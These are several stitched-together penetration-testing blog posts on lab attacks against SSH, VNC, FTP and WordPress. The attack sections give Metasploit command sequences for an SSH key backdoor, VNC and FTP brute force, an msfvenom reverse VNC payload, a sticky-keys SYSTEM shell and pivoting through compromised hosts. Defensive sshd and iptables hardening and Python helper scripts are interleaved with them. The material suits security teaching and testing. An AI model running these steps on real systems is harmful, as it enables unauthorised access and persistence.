From the image below you can see that we have downloaded everything stored in the .ssh directory. authorized_keys only lists public keys, so by itself it does not grant access; what matters is any private key found there (for example the .ppk copied to the server above, or the user's own id_rsa): with a private key an attacker can log in to this server, and to any other host whose authorized_keys lists the matching public key.

Create Permanent Backdoor

This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.

use post/linux/manage/sshkey_persistence

msf post(sshkey_persistence) > set session 1

msf post(sshkey_persistence) > exploit

Now, whenever the host is up, the attacker can connect to it with the added key without exploiting it again; this is a persistent backdoor, and a defender should review authorized_keys files for unknown entries.

Secure Against SSH Password Login

Therefore we apply the third measure of security: disable password authentication completely. Open /etc/ssh/sshd_config.

Here, uncomment the PasswordAuthentication line and change its value from yes (as shown in the image above) to no (as shown in the image below), then restart the SSH service. Also make sure ChallengeResponseAuthentication is set to no, otherwise PAM can still prompt for a password.

Now that we have applied three measures of security, brute force against this port no longer works: without a valid private key an attacker cannot log in, which is why the private key must stay on the client and be protected. If you want to access SSH from another machine, configure the same key on that PC too and it will have access.

Prevention against Brute force attack

Windows has an account lockout threshold policy which locks an account after a certain number of failed attempts. On Linux a similar effect, at the network level rather than per account, can be obtained with iptables rules.

Here the admin sets iptables rules that count new SSH connections per source address; if a source exceeds the defined number within the time window, it is blocked for the period specified by the admin.

Type the commands below (as root) to add the iptables rules:

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 120 --hitcount 3 -j DROP

Since -I inserts at the top of the chain, the DROP rule ends up before the --set rule. A source gets 3 new SSH connections; from the 4th one within 120 seconds (2 minutes) its connection attempts are dropped. Note that this counts connections, not failed logins, and blocks the source IP, not the account.

service ssh restart

Let's ensure the iptables rules work by running the brute force attack again as above.

Great!! The brute force was stopped after 3 attempts. Because --update refreshes the timestamp on every dropped packet, a source is blocked for as long as it has made 3 or more attempts in the trailing 2 minutes; a patient attacker can resume afterwards, so the admin may want a longer window or a tool such as fail2ban that bans on failed logins.
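The behaviour of the two iptables rules above, simulated as an added example (not from the article) so the limit can be checked without a test box. It models the xt_recent table in Python with one assumption: every new connection, accepted or dropped, adds a timestamp for the source, which is what --set and --update do; the sample timelines are constructed.

```python
from collections import defaultdict

WINDOW_SECONDS = 120   # --seconds 120
HITCOUNT = 3           # --hitcount 3


class RecentList:
    """Minimal model of the xt_recent table behind the two iptables rules.

    The DROP rule (inserted last, so evaluated first) matches when the source
    already has >= HITCOUNT timestamps younger than WINDOW_SECONDS; the --set
    rule then records the attempt for everything that got past it.
    Assumption: --update also records the timestamp of a dropped packet, so
    blocked attempts keep counting against the source."""

    def __init__(self, seconds: int = WINDOW_SECONDS, hitcount: int = HITCOUNT):
        self.seconds = seconds
        self.hitcount = hitcount
        self.stamps = defaultdict(list)   # source IP -> timestamps of NEW connections

    def new_connection(self, src: str, now: float) -> str:
        recent = [t for t in self.stamps[src] if now - t < self.seconds]
        verdict = "DROP" if len(recent) >= self.hitcount else "ACCEPT"
        recent.append(now)                # --update (DROP path) or --set (ACCEPT path)
        self.stamps[src] = recent
        return verdict


def simulate(attempts):
    """attempts: iterable of (source_ip, seconds); returns the verdict per attempt."""
    table = RecentList()
    return [table.new_connection(src, t) for src, t in attempts]


if __name__ == "__main__":
    # Constructed timeline: a brute forcer opening one connection per second,
    # then trying again after a long pause.
    timeline = [("192.168.1.10", t) for t in range(6)] + [("192.168.1.10", 200)]
    for (src, t), verdict in zip(timeline, simulate(timeline)):
        print(f"t={t:>4}s {src} -> {verdict}")
```

The simulation shows the two properties worth knowing before relying on this rule: a scanner that retries every second stays blocked, but one that spaces attempts out slips a connection through every couple of minutes, and every verdict is per source address, so a different IP starts with a clean count.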

Secure SSH by Changing the Port

Now that SSH has been configured, we can apply a further measure: changing the listening port. In /etc/ssh you will find the file "sshd_config".

Open this file and where it says Port 22, change it to Port 2222, then restart the SSH service.

This way SSH now listens on port 2222 instead of 22. This is obscurity rather than security (a full port scan with -p- still finds it), but it takes the service off the default port that automated scanners hit first. Let's check it with nmap to confirm.

nmap -sV 192.168.1.17
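The three sshd_config changes made in this article (DebianBanner, PasswordAuthentication, Port), as an added example that is not part of the original post: a small Python audit that reads an sshd_config, applies sshd's first-occurrence-wins rule, reports which of the weak settings are still in place, and rewrites the file with the hardened values. The sample configuration is constructed for the demonstration; Match blocks are not modelled.

```python
import re

# Constructed sample (not a file from the article): sshd_config as it looks
# after a default install, with the directives the article touches.
SAMPLE_SSHD_CONFIG = """\
# Package generated configuration file
Port 22
Protocol 2
PermitRootLogin yes
PubkeyAuthentication yes
#PasswordAuthentication yes
#DebianBanner yes
UsePAM yes
"""

# The article's hardened values; the key name is kept in canonical case.
HARDENED = {"Port": "2222", "DebianBanner": "no",
            "PasswordAuthentication": "no", "PubkeyAuthentication": "yes"}

# optional leading '#', keyword, separator (space or '='), value
_DIRECTIVE = re.compile(r"^\s*(#\s*)?([A-Za-z]+)(?:\s+|\s*=\s*)(\S.*)$")


def parse_sshd_config(text: str) -> dict:
    """Effective settings as {lowercase keyword: value}. Like sshd, the first
    occurrence of a keyword wins and commented-out lines are ignored."""
    settings = {}
    for line in text.splitlines():
        m = _DIRECTIVE.match(line)
        if not m or m.group(1):            # blank, junk or commented out
            continue
        settings.setdefault(m.group(2).lower(), m.group(3).strip())
    return settings


def audit(text: str) -> list:
    """Findings for the weaknesses the article fixes, using sshd's defaults
    for anything the file does not set."""
    cfg = parse_sshd_config(text)
    findings = []
    if cfg.get("port", "22") == "22":
        findings.append("sshd listens on the default port 22")
    if cfg.get("passwordauthentication", "yes").lower() != "no":
        findings.append("password authentication enabled: brute force possible")
    if cfg.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("public key authentication disabled: nothing left to log in with")
    if cfg.get("debianbanner", "yes").lower() != "no":
        findings.append("distribution suffix disclosed in the SSH version banner")
    return findings


def apply_hardening(text: str, desired: dict = HARDENED) -> str:
    """Rewrite the config: the first live or commented-out occurrence of each
    desired keyword is replaced in place (which also uncomments it), and
    keywords that never appeared are appended at the end."""
    wanted = {k.lower(): (k, v) for k, v in desired.items()}
    out, done = [], set()
    for line in text.splitlines():
        m = _DIRECTIVE.match(line)
        key = m.group(2).lower() if m else None
        if key in wanted and key not in done:
            canon, value = wanted[key]
            out.append(f"{canon} {value}")
            done.add(key)
        else:
            out.append(line)
    for key, (canon, value) in wanted.items():
        if key not in done:
            out.append(f"{canon} {value}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("before:", audit(SAMPLE_SSHD_CONFIG))
    print("after: ", audit(apply_hardening(SAMPLE_SSHD_CONFIG)))
```

Run it against the real file with audit(open("/etc/ssh/sshd_config").read()) before and after editing; the first-match rule matters because a hardened directive placed below an existing live one is silently ignored by sshd.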

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

The post SSH Penetration Testing (Port 22) appeared first on Hacking Articles.

Categories: Cyber India

VNC Pivoting through Meterpreter

Mon, 02/Oct/2017 - 22:25

In the previous articles we described VNC penetration testing and VNC tunneling through SSH; today we are going to demonstrate VNC pivoting.

From Offensive Security

Pivoting is a technique to get inside an unreachable network with the help of a pivot (centre point). In simple words it is an attack through which an attacker can exploit systems which belong to a different network. For this attack, the attacker needs to exploit the main server, which helps the attacker to add himself inside its local network, and then the attacker will be able to target the client systems for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine: Ubuntu operating system with two network interfaces

Target Machine: Ubuntu (with the VNC service enabled)

Exploit pivot machine

Generate a payload with msfvenom and start multi/handler to compromise the pivot machine (Ubuntu); read the complete article from here. Then escalate to root privileges on it (UAC is a Windows mechanism and does not apply to Ubuntu).

sessions

From the given image you can confirm that I own the pivot machine (192.168.1.226) as a meterpreter session.

Check the network interfaces with the following command:

meterpreter> ifconfig

From the given image you can observe two network interfaces on the pivot system: the 1st with IP 192.168.1.226, through which the attacker is connected, and the 2nd with IP 10.0.0.1, through which the VNC server (target) is reachable.

Route Add

Since the attacker is on the 192.168.1.0/24 network and the target on 10.0.0.0/24, it is not possible to attack the target network directly unless the attacker gets a route into it. To reach the 10.0.0.0 network through the compromised host, run the post-exploitation module "autoroute".

use post/multi/manage/autoroute

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

ARP Sweep to identify Active host

This module will enumerate alive hosts in the local network using ARP requests. Take the source address (SHOST, the pivot's 10.0.0.1 interface) and its MAC address (SMAC) from the pivot's interface listing shown above.

use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(arp_sweep) > set rhosts 10.0.0.1-254

msf auxiliary(arp_sweep) > set shost

msf auxiliary(arp_sweep) > set smac 00:0c:29:bf:43:94

msf auxiliary(arp_sweep) > run

Here we found a new host, IP 10.0.0.20, as shown in the given image. Let's perform a TCP port scan for active services on this machine.

TCP Port Scan post exploit

This module will enumerate open TCP ports of the target system.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhosts 10.0.0.20

msf auxiliary(tcp) > set threads 10

msf auxiliary(tcp) > exploit

From the given image you can observe that port 5900 is open, and we know that 5900 is used by the VNC service.

VNC brute force attack

To obtain the password for unauthorized access to the VNC machine, run a brute force attack with a password dictionary using the module below.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) > set rhosts 10.0.0.20

msf auxiliary(vnc_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

Awesome!! From the image below you can observe that the password 123456 has been found by Metasploit.

VNC Port forwarding on Local port

Now type the following command to forward the VNC port of the target to a local port on the attacker machine:

meterpreter> portfwd add -l 6000 -p 5900 -r 10.0.0.20

-l: the local port to listen on.

-p: the remote port to connect to.

-r: the remote host address to connect to.

Now open a terminal and type the following command to connect to the target machine through the forwarded port:

vncviewer 127.0.0.1:6000

Wonderful!! We have successfully gained unauthorized access to the VNC server through the pivot.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post VNC Pivoting through Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

VNC tunneling over SSH

Mon, 02/Oct/2017 - 12:07

In the previous article we performed VNC penetration testing; today you will see VNC tunneling, used to connect a remote machine to a VNC server when the two belong to different networks.

Basically, tunneling is a process which allows communication or data sharing between two different networks privately. Tunneling is normally performed by encapsulating the private network's data and protocol information inside the public network's transmission units, so that the private network's traffic appears to the public network as ordinary data. Here the SSH connection is the tunnel and the VNC traffic travels inside it, encrypted.

Let's Begin!!

Requirement:

Server machine (Ubuntu): two network interfaces with the SSH service active

Local machine (Ubuntu): VNC service active

Remote machine (Windows): TightVNC viewer installed

In the following image we try to explain the VNC tunneling process, where a remote PC with IP 192.168.1.225 is trying to connect to 10.0.0.20, which is on the intranet of another network. To establish the connection with the local machine, the remote PC creates a VNC tunnel over SSH which reaches the local system via the SSH server machine.

The image below describes the network configuration of the server machine (SSH), showing two IPs, 192.168.1.226 and 10.0.0.10, as explained above.

The next image describes the network configuration of the local machine, which has IP 10.0.0.20.

Check that the VNC service is active with the following command:

netstat -tlp

From the given image you can see the highlighted text showing that port 5900 is listening on the local machine.

Open a terminal on the server machine (IP: 10.0.0.10) and type the following command to connect to the VNC machine (IP: 10.0.0.20).

vncviewer 10.0.0.20

Great!! The local machine was reached from the server.

Similarly, using TightVNC viewer, the remote machine (192.168.1.225) now tries to connect to the local machine (IP: 10.0.0.20) as shown in the given image.

Since they belong to different networks, it receives a network error.

Follow the steps below to connect the remote machine to the local machine via the SSH server.

  • Open a TightVNC connection and enter the local machine IP 10.0.0.20 with port 5900.
  • Enable SSH tunneling.
  • Now enter the SSH server IP 192.168.1.226 with port 22 and the SSH server username: ubuntu.

Congrats!!! The remote machine has successfully connected to the local machine through VNC.
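What the meterpreter command portfwd add -l 6000 -p 5900 -r 10.0.0.20 in the VNC pivoting post and the SSH tunnel used by TightVNC above have in common is a TCP relay: a listener on a local port that copies bytes in both directions to a host the client cannot reach itself. The following is an added example, not code from either article: a minimal threaded relay in Python, with a constructed echo server standing in for the VNC server so the whole path can be exercised offline on 127.0.0.1. It does not encrypt anything; an SSH tunnel additionally wraps the hop to the SSH server inside the SSH session.

```python
import socket
import threading


def _pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until the sender closes, then pass the EOF on."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client: socket.socket, remote_host: str, remote_port: int) -> None:
    """One forwarded connection: a thread per direction, as portfwd does."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=10)
    except OSError:
        client.close()
        return
    threading.Thread(target=_pipe, args=(client, remote), daemon=True).start()
    threading.Thread(target=_pipe, args=(remote, client), daemon=True).start()


def start_forwarder(local_port: int, remote_host: str, remote_port: int,
                    bind: str = "127.0.0.1") -> int:
    """Listen on bind:local_port and relay every connection to remote_host:remote_port
    (the equivalent of 'portfwd add -l local_port -p remote_port -r remote_host').
    Returns the port actually bound, so 0 can be passed to let the OS choose."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind, local_port))
    listener.listen(5)

    def accept_loop():
        while True:
            client, _ = listener.accept()
            threading.Thread(target=_relay, args=(client, remote_host, remote_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def start_echo_server(bind: str = "127.0.0.1") -> int:
    """Constructed stand-in for the VNC server on the inner network: it echoes
    whatever it receives, so the relay can be checked end to end offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((bind, 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def relay_roundtrip(payload: bytes) -> bytes:
    """Client -> forwarder -> echo server -> back; returns what the client reads."""
    fwd_port = start_forwarder(0, "127.0.0.1", start_echo_server())
    with socket.create_connection(("127.0.0.1", fwd_port), timeout=10) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)          # the EOF travels through both hops
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print(relay_roundtrip(b"RFB 003.008\n"))
```

In the pivoting scenario start_forwarder(6000, "10.0.0.20", 5900) would be run on the host that has a route to 10.0.0.20, and vncviewer would then be pointed at 127.0.0.1:6000 exactly as in the article; the relay is protocol-agnostic, so the same code carries RFB, telnet or anything else over TCP.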

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post VNC tunneling over SSH appeared first on Hacking Articles.

Categories: Cyber India

VNC Penetration Testing (Port 5901)

Sat, 30/Sep/2017 - 17:42

Welcome to Internal penetration testing on VNC server where you will learn VNC installation and configuration, enumeration and attack, system security and precaution.

From Wikipedia

 Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction. It uses port 5900: VNC and 5901: VNC-1.

Penetration Lab Requirements

VNC Server: Ubuntu

Attacker system: Kali Linux

Client system: Windows (TightVNC viewer)

Let's start!!

VNC Installation

Open the terminal and follow the steps below, executing the given commands, for VNC installation.

The command below installs the GNOME desktop components (panel, settings daemon, the Metacity window manager, Nautilus and a terminal) that the VNC session needs for a usable graphical desktop.

sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

Now type the following command to install the VNC server.

sudo apt-get install vnc4server

The command below sets the server password that is required for VNC login.

sudo vncpasswd

The password should be at least 6 characters; here I set the server password 098765 for VNC authentication. Keep in mind that classic VNC authentication uses only the first 8 characters of the password.

Type the command below to start VNC display :1.

sudo vncserver :1

You need to kill the process if you want to make changes to the running VNC server.

sudo vncserver -kill :1

Now type the following command to open the VNC startup file and make some changes.

sudo gedit ~/.vnc/xstartup

Add the lines below to the startup file as shown in the image and save the changes.

exec gnome-session &

exec gnome-panel &

exec gnome-settings-daemon &

exec metacity &

Execute the command below to start the server again with the desired desktop resolution.

sudo vncserver :1 -geometry 1024x768 -depth 24

After following the 7 steps above, check the service status of the VNC server with the command below.

sudo netstat -tnl | grep 5901

From the given image you can confirm that port 5901 (display :1) is listening.

Connecting a Windows client to the VNC server

TightVNC is a free remote control package that includes a viewer for connecting to VNC servers. Install it on the Windows client.

Run TightVNC Viewer, enter the server as IP:port (192.168.1.218:5901) and click Connect.

The client is prompted for VNC authentication; enter the server password set above.

The Windows client is now connected to the Ubuntu desktop and can control its mouse and keyboard.

Scanning the target for enumeration

Scanning is the first step of the test: it tells the attacker which ports are open and which services are exposed for enumeration and attack.

Here nmap is used to scan for open ports:

nmap -sT 192.168.1.218

If the service is running on the target, nmap reports port 5901 in the open state.

Use the nmap script for VNC version

The following nmap command queries the VNC server for its protocol version and the security types it offers:

nmap -p 5901 --script vnc-info 192.168.1.218

The output shows protocol version 3.8 and security type 2 (VNC Authentication). A server offering security type 1 (None) would accept connections without any password at all, so this is the first thing to check.
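The vnc-info output is just a parse of the server's first two messages. The following Python, added here as an illustration and not part of the original article or of nmap, decodes a constructed copy of that handshake (the ProtocolVersion message followed by the security message) and reports the finding a tester would write up. The security type numbers are those of the RFB specification; the sample bytes are constructed, not captured from the lab.

```python
import struct

# Security type numbers from the RFB specification (RFC 6143 plus common extensions).
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication", 5: "RA2",
                  6: "RA2ne", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_rfb_handshake(data):
    """Decode the server's ProtocolVersion message and the security message that follows it.

    `data` is the server side of the handshake concatenated: "RFB xxx.yyy\\n" plus the
    security message the server sends once the client has answered with its own version.
    Returns (version, [security types]). RFB 3.3 servers choose the type themselves and
    send it as one big-endian u32; 3.7 and later send a u8 count and one u8 per type.
    """
    if len(data) < 12 or not data.startswith(b"RFB "):
        raise ValueError("not an RFB ProtocolVersion message")
    major, minor = int(data[4:7]), int(data[8:11])
    version = f"{major}.{minor}"
    rest = data[12:]
    if (major, minor) < (3, 7):
        (sec_type,) = struct.unpack(">I", rest[:4])
        return version, [sec_type]
    count = rest[0]
    if count == 0:
        # A zero count means the server refused us; a length-prefixed reason follows.
        (reason_len,) = struct.unpack(">I", rest[1:5])
        reason = rest[5:5 + reason_len].decode("ascii", "replace")
        raise ConnectionError(f"server refused handshake: {reason}")
    types = list(rest[1:1 + count])
    if len(types) != count:
        raise ValueError("security type list truncated")
    return version, types


def assess(security_types):
    """Turn the offered security types into the finding a tester would report."""
    names = [SECURITY_TYPES.get(t, f"unknown({t})") for t in security_types]
    if 1 in security_types:
        return "CRITICAL: security type None offered; the desktop is reachable without a password"
    if security_types == [2]:
        return ("WARNING: only VNC Authentication offered; a DES challenge-response over at most "
                "8 password characters, which is exactly what vnc-brute and vnc_login attack")
    if 18 in security_types or 19 in security_types:
        return "INFO: encrypted security types offered: " + ", ".join(names)
    return "INFO: security types offered: " + ", ".join(names)


def audit(data):
    """Convenience wrapper: parse the handshake and return (version, types, finding)."""
    version, types = parse_rfb_handshake(data)
    return version, types, assess(types)


if __name__ == "__main__":
    # Constructed sample matching the lab output: RFB 3.8, one security type, VNC Authentication (2).
    lab_server = b"RFB 003.008\n" + bytes([1, 2])
    print(audit(lab_server))
    # Constructed RFB 3.3 server that picked "None": the worst case a scan can find.
    print(audit(b"RFB 003.003\n" + b"\x00\x00\x00\x01"))
```

Feed it the first bytes read from the socket after connecting and after replying with the same version string the server sent; a zero security count is the refusal path that some servers take when the client address is not in their allow list.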

Use the nmap script for a VNC brute-force attack

The following nmap command performs password auditing against the VNC server using a dictionary file:

nmap -p 5901 --script vnc-brute 192.168.1.218 --script-args passdb=/root/Desktop/pass.txt

Great!! The output shows the valid password: 098765

Use Metasploit for VNC brute force attack

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) >set rhosts 192.168.1.218

msf auxiliary(vnc_login) >set rport 5901

msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

Awesome!! Metasploit reports the same password: 098765.

Attacker connects to the VNC server

Open a new terminal and connect to the VNC server with the recovered password 098765:

vncviewer 192.168.1.218:5901

Nice!! After a successful brute-force attack the attacker connects to the VNC server just like a legitimate client.

Capture a VNC session on a remote Windows system using msfvenom

Next, create a VNC payload with msfvenom and use it to obtain a VNC view of the victim's desktop.

Open a terminal in Kali Linux and generate the payload. The LHOST and LPORT values must match the handler started below:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=4455 -f exe > /var/www/html/vnc.exe

The command writes the VNC payload as an exe into /var/www/html on the Kali machine.

As the attacker you need to deliver this backdoor to the target and start the multi/handler in the Metasploit framework:

msfconsole

use exploit/multi/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.216

msf exploit(handler) > set lport 4455

msf exploit(handler) > set viewonly false

msf exploit(handler) > run

When the target runs the payload it connects back to the handler, which launches vncviewer automatically while session 1 keeps running in the background.

The victim's desktop is now visible to, and controllable by, the attacker (viewonly was set to false).

Another way to capture a VNC session on a remote Windows system

Suppose you have already exploited a Windows system and hold a Meterpreter session on it.

The following command injects a VNC DLL via a reflective loader (staged) and connects back to the attacker:

meterpreter > run vnc

Great!! The attacker is connected to the victim's desktop again.

Moving the VNC server to a non-default port

The vncserver wrapper script hard-codes the base port. Open it with:

sudo gedit /usr/bin/vncserver

Make the following changes:

Comment out the line “vncport = 5900” by prefixing it with #.

Add a new line that sets the port to 8800: vncPort = 8800;

Now connect with TightVNC Viewer through port 8800 as before and enter the password.

The VNC connection is established on the new port. Keep in mind that this only hides the service from scans of the default port: a full port scan and the vnc-info script will still find it, and the password is still exposed to the brute-force attacks shown above. Real hardening means binding the server to the loopback interface and reaching it over an SSH tunnel, or using a VNC variant that offers TLS and a stronger authentication scheme.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post VNC Penetration Testing (Port 5901) appeared first on Hacking Articles.

Categories: Cyber India

FTP Pivoting through RDP

Fri, 29/Sep/2017 - 22:17

In our previous tutorials we discussed SSH pivoting and RDP pivoting; today you will learn FTP pivoting.

From Offensive Security

Pivoting is a technique for reaching an otherwise unreachable network through a pivot (a compromised host with a foothold in both networks). In other words, it lets an attacker attack systems that belong to a different network segment. The attacker first exploits a machine that sits on both networks, uses it to route traffic into the internal segment, and then targets the client systems there.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine: Windows with two network interfaces

Target Machine: Windows 7 running an FTP service

Exploit the pivot machine

Use the MS17-010 exploit or a multi/handler payload to compromise the pivot machine, then bypass UAC to obtain administrative privileges.

sessions

The session list confirms that the pivot machine (192.168.0.101) is owned as Meterpreter session 1.

Launch the sticky keys attack

Next run the sticky_keys post module against the session:

use post/windows/manage/sticky_keys

msf post(sticky_keys) > set session 1

msf post(sticky_keys) > exploit

Great!! The sticky keys hack is in place on the pivot. It registers cmd.exe as the debugger for sethc.exe, so pressing Shift five times at the logon screen spawns a SYSTEM command prompt; we will use that later to reach the FTP server from the pivot.

Enable the RDP service

Inside Meterpreter session 1, the following command enables Remote Desktop on the pivot:

meterpreter > run getgui -e

Verify the pivot's network interfaces

Check the network interfaces with:

meterpreter > ifconfig

The output shows two interfaces on the pivot: 192.168.0.101, through which the attacker is connected, and 192.168.100.102, which faces the network where the FTP server (the target) lives.

Use the autoroute post module

The attacker sits on the 192.168.0.0/24 segment while the FTP server sits on 192.168.100.0/24, so the attacker cannot reach it directly. To get there, traffic for 192.168.100.0/24 has to be routed through the Meterpreter session on the pivot, which is what the autoroute post module sets up.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

use post/multi/manage/autoroute 

msf post(autoroute) > set session 1

msf post(autoroute) > exploit
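What autoroute's autoadd does, in plain Python, as an added illustration that is not part of the article or of Metasploit: take the pivot's interface list (as read from ifconfig) and the attacker's own address, and return the subnets worth routing through the session. The attacker address 192.168.0.104 is assumed here; the article does not state it.

```python
import ipaddress


def pivot_routes(attacker_ip, pivot_interfaces):
    """Return the subnets (as CIDR strings) to route through the Meterpreter session.

    attacker_ip: the attacker's address on the segment shared with the pivot.
    pivot_interfaces: "address/prefix" strings for each interface on the pivot.
    Mirrors autoroute's autoadd: one route per interface subnet, skipping loopback and
    link-local ranges and the segment the attacker already reaches directly.
    """
    me = ipaddress.ip_address(attacker_ip)
    routes = []
    for cidr in pivot_interfaces:
        net = ipaddress.ip_interface(cidr).network
        if net.is_loopback or net.is_link_local:
            continue  # 127.0.0.0/8 and 169.254.0.0/16 never need a pivot
        if me in net:
            continue  # the attacker is on this segment already; a route here would loop traffic through the session
        if str(net) not in routes:
            routes.append(str(net))
    return routes


def route_commands(session_id, routes):
    """Render the equivalent manual msfconsole commands, for when explicit routes are
    preferred over the module's defaults."""
    return [f"route add {r} {session_id}" for r in routes]


if __name__ == "__main__":
    # Pivot interfaces taken from the article's ifconfig output; loopback added for completeness.
    ifaces = ["192.168.0.101/24", "192.168.100.102/24", "127.0.0.1/8"]
    routes = pivot_routes("192.168.0.104", ifaces)   # attacker address is an assumption
    print(routes)
    print("\n".join(route_commands(1, routes)))
```

The point of excluding the shared segment is practical: a route for 192.168.0.0/24 through session 1 would send the attacker's own traffic to the pivot through the pivot, which at best is slow and at worst breaks the session carrying it.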

Use the ping sweep post module

This module performs an IPv4 ping sweep using the ping command of the compromised host's OS, so the probes originate from the pivot itself.

use post/windows/gather/ping_sweep

msf post(ping_sweep) > set rhosts 192.168.100.1-110

msf post(ping_sweep) > set session 1

msf post(ping_sweep) > exploit

The sweep finds a live host at 192.168.100.103. Next, scan it for open TCP services.

Use the TCP port scan module

This module enumerates open TCP services by performing a full TCP connect on each port. It needs no administrative privileges on the source machine, which is useful when pivoting. With the route added above, the connections leave through the Meterpreter session.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 21

msf auxiliary(tcp) > set rhosts 192.168.100.103

msf auxiliary(tcp) > set threads 10

msf auxiliary(tcp) > exploit

The scan shows port 21 open, the default port for FTP.

FTP login brute force

This module tests FTP logins on a range of machines and reports successful logins. If a database plugin is loaded and connected, it records the successful logins and hosts so you can track your access.

use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts 192.168.100.103

msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt

msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(ftp_login) > set stop_on_success true

msf auxiliary(ftp_login) > exploit

The module reports a valid combination: username raj with password 123.

Connect to the pivot through RDP

Open a new terminal in Kali Linux and connect to the pivot machine over RDP:

rdesktop 192.168.0.101

Recall the sticky keys hack launched earlier: it opens a command prompt on the logon screen when Shift is pressed five times.

Press Shift five times to get the command prompt, then type “start iexplore.exe” to launch Internet Explorer.

Connect to the FTP server

Enter the following URL in the browser to open an FTP connection:

ftp://192.168.100.103

Enter the credentials found by the FTP brute force, i.e. raj:123

Congrats!!! We are connected to the FTP server through the pivot machine, without ever authenticating to the pivot's Windows logon.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, a social media lover and a gadgets enthusiast. Contact here

The post FTP Pivoting through RDP appeared first on Hacking Articles.


WordPress Penetration Testing using WPScan & Metasploit

Wed, 27/Sep/2017 - 12:51

In our previous article we discussed “WordPress Penetration Testing Lab Setup in Ubuntu”; today you will learn WordPress penetration testing using WPScan and Metasploit.

Attacker: Kali Linux

Target: WordPress

WPScan is a black-box vulnerability scanner for WordPress, written in Ruby, that focuses on vulnerabilities in WordPress core, themes and plugins. It is installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch and BackBox Linux. WPScan uses a database of known plugins and themes (approximately 18,000 plugins and 2,600 themes at the time of writing) to identify outdated versions and known vulnerabilities on the target.

Things WPScan can do for you:

-Detect the version of the installed WordPress.

-Detect sensitive files such as readme.html, robots.txt and database backup files.

-Detect enabled features of the installed WordPress.

-Enumerate theme names and versions.

-Detect installed plugins and tell you whether they are outdated.

-Enumerate usernames.

Let’s start.

Go to your Kali Linux terminal and type the following to download WPScan from GitHub:

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

Now run the script from the cloned directory to see its options:

./wpscan.rb -h

Using the default options we will scan our WordPress website.

Scanning the WordPress version of the target website

WPScan is a great tool for scanning WordPress sites. We start with a basic scan and then use the enumerate options to gather information about themes, plugins, usernames and so on.

Type the following command to scan the WordPress site and its server:

./wpscan.rb -u http://192.168.0.101/wordpress/

Replace http://192.168.0.101/wordpress/ with the URL of the site you want to scan.

Here it found the server Apache/2.4.7, PHP/5.5.9 and WordPress version 4.8.1; with this information an attacker can search for matching exploits. It also found that directory listing is enabled on the uploads directory, which means anyone can browse /wp-content/uploads and view the uploaded files.

Enumerating WordPress themes

A theme controls the general look and feel of a website, including page layout, widget locations and default fonts and colours. WordPress.com offers a wide range of themes, and each theme has an about page listing its features and instructions.

To enumerate the installed themes of the WordPress site, type:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate t

